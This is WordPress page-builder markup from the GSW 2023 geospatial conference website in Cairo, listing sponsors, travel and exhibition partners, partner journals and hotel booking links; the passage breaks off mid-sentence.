/></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145701200{margin-top: -100px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 